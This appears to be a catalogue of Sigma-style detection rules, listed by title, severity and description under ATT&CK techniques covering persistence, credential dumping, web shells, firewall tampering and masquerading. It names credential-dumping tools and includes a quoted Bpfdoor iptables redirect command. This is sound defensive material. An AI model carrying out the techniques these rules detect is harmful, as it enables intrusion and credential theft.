  • Suspicious Microsoft Office Child Process - Level: high
    Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
  • Potential Suspicious Browser Launch From Document Reader Process - Level: medium
    Description: Detects when a browser process or browser tab is launched from an application that handles document files, such as Adobe or Microsoft Office, and connects to a web application over HTTP(S). This could indicate a possible phishing attempt.
  • Suspicious WMIC Execution Via Office Process - Level: high
    Description: Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).
  • Suspicious WmiPrvSE Child Process - Level: high
    Description: Detects suspicious and uncommon child processes of WmiPrvSE
  • New Application in AppCompat - Level: informational
    Description: A general detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
  • Exploit for CVE-2017-0261 - Level: medium
    Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
  • Droppers Exploiting CVE-2017-11882 - Level: critical
    Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
  • Exploit for CVE-2017-8759 - Level: critical
    Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
  • Ursnif Malware C2 URL Pattern - Level: critical
    Description: Detects Ursnif C2 traffic.
  • Potential Maze Ransomware Activity - Level: critical
    Description: Detects specific process characteristics of Maze ransomware word document droppers
  • Kapeka Backdoor Loaded Via Rundll32.EXE - Level: high
    Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
  • Microsoft Excel Add-In Loaded - Level: low
    Description: Detects Microsoft Excel loading an Add-In (.xll) file
  • Microsoft Word Add-In Loaded - Level: low
    Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
  • File Creation by Office Applications - Level: high
    Description: This rule will monitor executable and script file creation by Office applications. Please add more file extensions or magic bytes to the logic of your choice.
attack.t1547.001 37
Show Rules (37)
  • Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • File Creation In Suspicious Directory By Msdt.EXE - Level: high
    Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
  • Potential Startup Shortcut Persistence Via PowerShell.EXE - Level: high
    Description: Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
  • Startup Folder File Write - Level: medium
    Description: A general detection for files being created in the Windows startup directory. This could be an indicator of persistence.
  • Suspicious Startup Folder Persistence - Level: high
    Description: Detects when a file with a suspicious extension is created in the startup folder
  • Potential Persistence Attempt Via Run Keys Using Reg.EXE - Level: medium
    Description: Detects a suspicious reg.exe command line adding a key to the RUN key in the registry
  • Direct Autorun Keys Modification - Level: medium
    Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
  • Narrator's Feedback-Hub Persistence - Level: high
    Description: Detects abusing Windows 10 Narrator's Feedback-Hub
  • Suspicious Run Key from Download - Level: high
    Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
  • CurrentVersion Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Common Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Classes Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • CurrentControlSet Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • CurrentVersion NT Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Internet Explorer Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Office Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Session Manager Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • System Scripts Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • WinSock2 Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Wow6432Node CurrentVersion Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Wow6432Node Classes Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Wow6432Node Windows NT CurrentVersion Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Suspicious Powershell In Registry Run Keys - Level: medium
    Description: Detects potential PowerShell commands or code within registry run keys
  • Registry Persistence via Explorer Run Key - Level: high
    Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
  • New RUN Key Pointing to Suspicious Folder - Level: high
    Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
  • Modify User Shell Folders Startup Value - Level: high
    Description: Detects modification of the startup key to a path where a payload could be stored to be launched during startup
  • VBScript Payload Stored in Registry - Level: high
    Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
  • Potential Ryuk Ransomware Activity - Level: high
    Description: Detects Ryuk ransomware activity
  • Leviathan Registry Key Activity - Level: critical
    Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
  • Suspicious VBScript UN2452 Pattern - Level: high
    Description: Detects suspicious inline VBScript keywords as used by UNC2452
  • Potential KamiKakaBot Activity - Winlogon Shell Persistence - Level: high
    Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
  • Kapeka Backdoor Autorun Persistence - Level: high
    Description: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.
  • Forest Blizzard APT - Custom Protocol Handler Creation - Level: high
    Description: Detects the setting of a custom protocol handler with the name "rogue". Seen being created by Forest Blizzard APT as reported by MSFT.
  • Forest Blizzard APT - Custom Protocol Handler DLL Registry Set - Level: high
    Description: Detects the setting of the DLL that handles the custom protocol handler. Seen being created by Forest Blizzard APT as reported by MSFT.
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the setting of a registry value inside "\Shell\Open\Command" with PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used, for example, to decrypt a malicious payload for defense evasion.
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
attack.t1059.003 34
Show Rules (34)
  • Read and Execute a File Via Cmd.exe - Level: medium
    Description: Detects the use of "/R <" to read and execute a file via cmd.exe
  • AWS EC2 Startup Shell Script Change - Level: high
    Description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
  • Remote Access Tool - ScreenConnect Command Execution - Level: low
    Description: Detects command execution via ScreenConnect RMM
  • Remote Access Tool - ScreenConnect File Transfer - Level: low
    Description: Detects file being transferred via ScreenConnect RMM
  • File Was Not Allowed To Run - Level: medium
    Description: Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.
  • Remote Access Tool - ScreenConnect Temporary File - Level: low
    Description: Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has a feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
  • Powershell Execute Batch Script - Level: medium
    Description: Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems
  • Command Line Execution with Suspicious URL and AppData Strings - Level: medium
    Description: Detects a suspicious command line execution that includes a URL and an AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
  • Potential CommandLine Path Traversal Via Cmd.EXE - Level: high
    Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
  • Read Contents From Stdin Via Cmd.EXE - Level: medium
    Description: Detects the use of "<" to read and potentially execute a file via cmd.exe
  • Powershell Executed From Headless ConHost Process - Level: medium
    Description: Detects the use of PowerShell commands from a headless ConHost window. The "--headless" flag hides the window from the user upon execution.
  • Conhost.exe CommandLine Path Traversal - Level: high
    Description: Detects the usage of path traversal in conhost.exe, indicating possible command/argument confusion/hijacking
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • Operator Bloopers Cobalt Strike Commands - Level: high
    Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
  • Operator Bloopers Cobalt Strike Modules - Level: high
    Description: Detects Cobalt Strike modules/commands accidentally entered in the CMD shell
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • HackTool - CrackMapExec Execution Patterns - Level: high
    Description: Detects various execution patterns of the CrackMapExec pentesting framework
  • HackTool - Jlaive In-Memory Assembly Execution - Level: medium
    Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell
  • HackTool - Koadic Execution - Level: high
    Description: Detects command line parameters used by Koadic hack tool
  • HackTool - RedMimicry Winnti Playbook Execution - Level: high
    Description: Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility
  • Suspicious HWP Sub Processes - Level: high
    Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate exploitation
  • PUA - AdvancedRun Execution - Level: medium
    Description: Detects the execution of AdvancedRun utility
  • Remote Access Tool - ScreenConnect Remote Command Execution - Level: low
    Description: Detects the execution of a system command via the ScreenConnect RMM service.
  • ZxShell Malware - Level: critical
    Description: Detects a ZxShell start by the called and well-known function name
  • Elise Backdoor Activity - Level: critical
    Description: Detects Elise backdoor activity used by APT32
  • Sofacy Trojan Loader Activity - Level: high
    Description: Detects Trojan loader activity as used by APT28
  • Exploiting SetupComplete.cmd CVE-2019-1378 - Level: high
    Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
  • Potential Baby Shark Malware Activity - Level: high
    Description: Detects activity that could be related to Baby Shark malware
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE - Level: medium
    Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.
  • Rorschach Ransomware Execution Activity - Level: critical
    Description: Detects Rorschach ransomware execution activity
  • Potential APT FIN7 Exploitation Activity - Level: medium
    Description: Detects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
  • Headless Process Launched Via Conhost.EXE - Level: medium
    Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag. The "--headless" flag hides the window from the user upon execution.
attack.t1003.002 28
Show Rules (28)
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • Registry Dump of SAM Creds and Secrets - Level: high
    Description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through the Windows Registry where the SAM database is stored
  • SAM Dump to AppData - Level: high
    Description: Detects suspicious SAM dump activity as caused by QuarksPwDump and other password dumpers
  • Antivirus Password Dumper Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
  • Possible Impacket SecretDump Remote Activity - Zeek - Level: high
    Description: Detects AD credential dumping using the impacket secretdump HKTL. Based on the SIGMA rule rules/windows/builtin/win_impacket_secretdump.yml
  • Transferring Files with Credential Data via Network Shares - Zeek - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different event logs (some of them only appear in older Mimikatz versions that are however still used by different threat groups)
  • Possible Impacket SecretDump Remote Activity - Level: high
    Description: Detects AD credential dumping using the impacket secretdump HKTL
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Transferring Files with Credential Data via Network Shares - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • VSSAudit Security Event Source Registration - Level: informational
    Description: Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.
  • Critical Hive In Suspicious Location Access Bits Cleared - Level: high
    Description: Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system-like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not been recognized within the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.
  • Volume Shadow Copy Mount - Level: low
    Description: Detects volume shadow copy mount via Windows event log
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Cred Dump Tools Dropped Files - Level: high
    Description: Detects the creation of files with well-known filenames (parts of credential dump software or files produced by them)
  • HackTool - QuarksPwDump Dump File - Level: critical
    Description: Detects a dump file written by QuarksPwDump password dumper
  • NTDS.DIT Creation By Uncommon Process - Level: high
    Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
  • Potential SAM Database Dump - Level: high
    Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager)
  • HackTool - Credential Dumping Tools Named Pipe Created - Level: critical
    Description: Detects well-known credential dumping tools execution via specific named pipe creation
  • VolumeShadowCopy Symlink Creation Via Mklink - Level: high
    Description: Detects the creation of a symbolic link to Shadow Copies storage using operating system utilities
  • Copying Sensitive Files with Credential Data - Level: high
    Description: Detects the copying of files with well-known filenames (sensitive files with credential data)
  • HackTool - Mimikatz Execution - Level: high
    Description: Detects well-known mimikatz command line arguments
  • HackTool - Pypykatz Credentials Dumping Activity - Level: high
    Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
  • HackTool - Quarks PwDump Execution - Level: high
    Description: Detects usage of the Quarks PwDump tool via commandline arguments
  • PowerShell SAM Copy - Level: high
    Description: Detects suspicious PowerShell scripts accessing SAM hives
  • Dumping of Sensitive Hives Via Reg.EXE - Level: high
    Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
  • Shadow Copies Creation Using Operating Systems Utilities - Level: medium
    Description: Detects Shadow Copies creation using operating system utilities, which could indicate credential access
  • Esentutl Volume Shadow Copy Service Keys - Level: high
    Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.
attack.t1505.003 28
Show Rules (28)
  • Antivirus Web Shell Detection - Level: high
    Description: Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. GitHub and checking the matches. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
  • Webshell Remote Command Execution - Level: critical
    Description: Detects possible command execution by web application/web shell
  • Shellshock Expression - Level: high
    Description: Detects shellshock expressions in log files
  • Linux Webshell Indicators - Level: high
    Description: Detects suspicious sub processes of web server processes
  • Suspicious Windows Strings In URI - Level: high
    Description: Detects suspicious Windows strings in a URI, which could indicate possible exfiltration or webshell communication
  • Webshell ReGeorg Detection Via Web Logs - Level: high
    Description: Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.
  • Windows Webshell Strings - Level: high
    Description: Detects common commands used in Windows webshells
  • Mailbox Export to Exchange Webserver - Level: critical
    Description: Detects a successful export of an Exchange mailbox to an untypical directory or with an aspx name suffix, which can be used to place a webshell, or the needed role assignment for it
  • Certificate Request Export to Exchange Webserver - Level: critical
    Description: Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell
  • Exchange Set OabVirtualDirectory ExternalUrl Property - Level: high
    Description: Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log
  • Suspicious ASPX File Drop by Exchange - Level: high
    Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
  • Suspicious File Drop by Exchange - Level: medium
    Description: Detects suspicious file type dropped by an Exchange component in IIS
  • Suspicious MSExchangeMailboxReplication ASPX Write - Level: high
    Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation
  • Potential Webshell Creation On Static Website - Level: medium
    Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
  • IIS Native-Code Module Command Line Installation - Level: medium
    Description: Detects suspicious IIS native-code module installations via command line
  • Suspicious Child Process Of SQL Server - Level: high
    Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
  • Chopper Webshell Process Pattern - Level: high
    Description: Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells
  • Webshell Hacking Activity Patterns - Level: high
    Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
  • Webshell Detection With Command Line Keywords - Level: high
    Description: Detects certain command line parameters often used during reconnaissance activity via web shells
  • Suspicious Process By Web Server Process - Level: high
    Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
  • Webshell Tool Reconnaissance Activity - Level: high
    Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
  • Rejetto HTTP File Server RCE - Level: high
    Description: Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287
  • Oracle WebLogic Exploit - Level: critical
    Description: Detects access to a webshell dropped into a keystore folder on the WebLogic server
  • Solarwinds SUPERNOVA Webshell Access - Level: critical
    Description: Detects access to SUPERNOVA webshell as described in Guidepoint report
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit - Level: critical
    Description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
  • DEWMODE Webshell Access - Level: high
    Description: Detects access to DEWMODE webshell as described in FIREEYE report
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request - Level: high
    Description: Detects GET requests to specific files used during the exploitation of MOVEit CVE-2023-34362
  • Execution From Webserver Root Folder - Level: medium
    Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
attack.t1562.004 28
Show Rules (28)
  • Azure Firewall Modified or Deleted - Level: medium
    Description: Identifies when a firewall is created, modified, or deleted.
  • Azure Firewall Rule Collection Modified or Deleted - Level: medium
    Description: Identifies when Rule Collections (Application, NAT, and Network) are being modified or deleted.
  • Bpfdoor TCP Ports Redirect - Level: medium
    Description: All TCP traffic on a particular port from the attacker is routed to a different port, e.g. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'. The traffic looks like encrypted SSH communication going to TCP port 22, but in reality it is being directed to the shell port once it hits the iptables rule, for the attacker host only.
  • Disable System Firewall - Level: high
    Description: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.
  • Modify System Firewall - Level: medium
    Description: Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this.
  • Disabling Security Tools - Builtin - Level: medium
    Description: Detects the disabling of security tools
  • Ufw Force Stop Using Ufw-Init - Level: medium
    Description: Detects attempts to force-stop ufw using ufw-init
  • Flush Iptables Ufw Chain - Level: medium
    Description: Detects use of iptables to flush all firewall rules, tables and chains and allow all network traffic
  • Disabling Security Tools - Level: medium
    Description: Detects the disabling of security tools
  • Uncommon New Firewall Rule Added In Windows Firewall Exception List - Level: medium
    Description: Detects when a rule has been added to the Windows Firewall exception list
  • New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application - Level: high
    Description: Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.
  • New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE - Level: medium
    Description: Detects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE). This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule".
  • All Rules Have Been Deleted From The Windows Firewall Configuration - Level: high
    Description: Detects when all the rules have been deleted from the Windows Defender Firewall configuration
  • A Rule Has Been Deleted From The Windows Firewall Exception List - Level: medium
    Description: Detects when a single rule or all of the rules have been deleted from the Windows Defender Firewall
  • The Windows Defender Firewall Service Failed To Load Group Policy - Level: low
    Description: Detects activity when the Windows Defender Firewall service failed to load Group Policy
  • Windows Defender Firewall Has Been Reset To Its Default Configuration - Level: low
    Description: Detects activity when Windows Defender Firewall has been reset to its default configuration
  • Windows Firewall Settings Have Been Changed - Level: low
    Description: Detects activity when the settings of the Windows firewall have been changed
  • Windows Firewall Profile Disabled - Level: medium
    Description: Detects when a user disables the Windows Firewall via a Profile to help evade defense.
  • New Firewall Rule Added Via Netsh.EXE - Level: medium
    Description: Detects the addition of a new rule to the Windows firewall via netsh
  • Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE - Level: high
    Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall
  • RDP Connection Allowed Via Netsh.EXE - Level: high
    Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
  • Firewall Rule Deleted Via Netsh.EXE - Level: medium
    Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh
  • Firewall Disabled via Netsh.EXE - Level: medium
    Description: Detects netsh commands that turn off the Windows firewall
  • Netsh Allow Group Policy on Microsoft Defender Firewall - Level: medium
    Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
  • Disable Microsoft Defender Firewall via Registry - Level: medium
    Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
  • Disable Windows Firewall by Registry - Level: medium
    Description: Detects setting EnableFirewall to 0 to disable the Windows firewall
  • Firewall Rule Modified In The Windows Firewall Exception List - Level: low
    Description: Detects when a rule has been modified in the Windows firewall exception list
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock - Level: low
    Description: Detects when a PowerShell script contains calls to the "New-NetFirewallRule" cmdlet in order to add a new firewall rule with an "Allow" action.
attack.t1036.003 27
  • Renamed PaExec Execution - Level: medium
    Description: Detects execution of renamed paexec via imphash and executable product string
  • Renamed PsExec - Level: high
    Description: Detects the execution of a renamed PsExec often used by attackers or malware
  • Renamed PowerShell - Level: high
    Description: Detects the execution of a renamed PowerShell often used by attackers or malware
  • Masquerading as Linux Crond Process - Level: medium
    Description: Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
  • Potential Homoglyph Attack Using Lookalike Characters in Filename - Level: medium
    Description: Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
  • Renamed Powershell Under Powershell Channel - Level: low
    Description: Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.
  • Suspicious Start-Process PassThru - Level: medium
    Description: PowerShell uses the PassThru option to start a process in the background
  • Suspicious Download From Direct IP Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file using a URL that contains an IP
  • File Download Via Bitsadmin - Level: medium
    Description: Detects usage of bitsadmin downloading a file
  • Suspicious Download From File-Sharing Website Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file from a suspicious domain
  • File With Suspicious Extension Downloaded Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file with a suspicious extension
  • File Download Via Bitsadmin To A Suspicious Target Folder - Level: high
    Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
  • File Download Via Bitsadmin To An Uncommon Target Folder - Level: medium
    Description: Detects usage of bitsadmin downloading a file to an uncommon target folder
  • PUA - Potential PE Metadata Tamper Using Rcedit - Level: medium
    Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
  • Potential Defense Evasion Via Binary Rename - Level: medium
    Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
  • Potential Defense Evasion Via Rename Of Highly Relevant Binaries - Level: high
    Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
  • Renamed BrowserCore.EXE Execution - Level: high
    Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
  • Renamed Jusched.EXE Execution - Level: high
    Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
  • Renamed Msdt.EXE Execution - Level: high
    Description: Detects the execution of a renamed "Msdt.exe" binary
  • Renamed ProcDump Execution - Level: high
    Description: Detects the execution of a renamed ProcDump executable. This is often done by attackers or malware in order to evade defensive mechanisms.
  • Suspicious Copy From or To System Directory - Level: medium
    Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
  • LOL-Binary Copied From System Directory - Level: high
    Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
  • Potential Homoglyph Attack Using Lookalike Characters - Level: medium
    Description: Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
  • Windows Processes Suspicious Parent Directory - Level: low
    Description: Detect suspicious parent processes of well-known Windows processes
  • Potential WerFault ReflectDebugger Registry Value Abuse - Level: high
    Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
  • Potential PendingFileRenameOperations Tampering - Level: medium
    Description: Detects changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious image locations to stage currently used files for rename or deletion after reboot.
  • Ps.exe Renamed SysInternals Tool - Level: high
    Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
attack.t1218.010 26
  • New Lolbin Process by Office Applications - Level: high
    Description: This rule will monitor any Office app that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
  • Excel Proxy Executing Regsvr32 With Payload - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes.
  • Excel Proxy Executing Regsvr32 With Payload Alternate - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes.
  • Office Applications Spawning Wmi Cli Alternate - Level: high
    Description: Initial execution of malicious document calls wmic to execute the file with regsvr32
  • Regsvr32 Anomaly - Level: high
    Description: Detects various anomalies in relation to regsvr32.exe
  • WMI Execution Via Office Process - Level: medium
    Description: Initial execution of malicious document calls wmic to execute the file with regsvr32
  • DNS Query Request By Regsvr32.EXE - Level: medium
    Description: Detects DNS queries initiated by "Regsvr32.exe"
  • Unsigned DLL Loaded by Windows Utility - Level: medium
    Description: Detects Windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.
  • Network Connection Initiated By Regsvr32.EXE - Level: medium
    Description: Detects a network connection initiated by "Regsvr32.exe"
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • Suspicious Microsoft Office Child Process - Level: high
    Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
  • Potential Regsvr32 Commandline Flag Anomaly - Level: medium
    Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
  • Potentially Suspicious Regsvr32 HTTP IP Pattern - Level: high
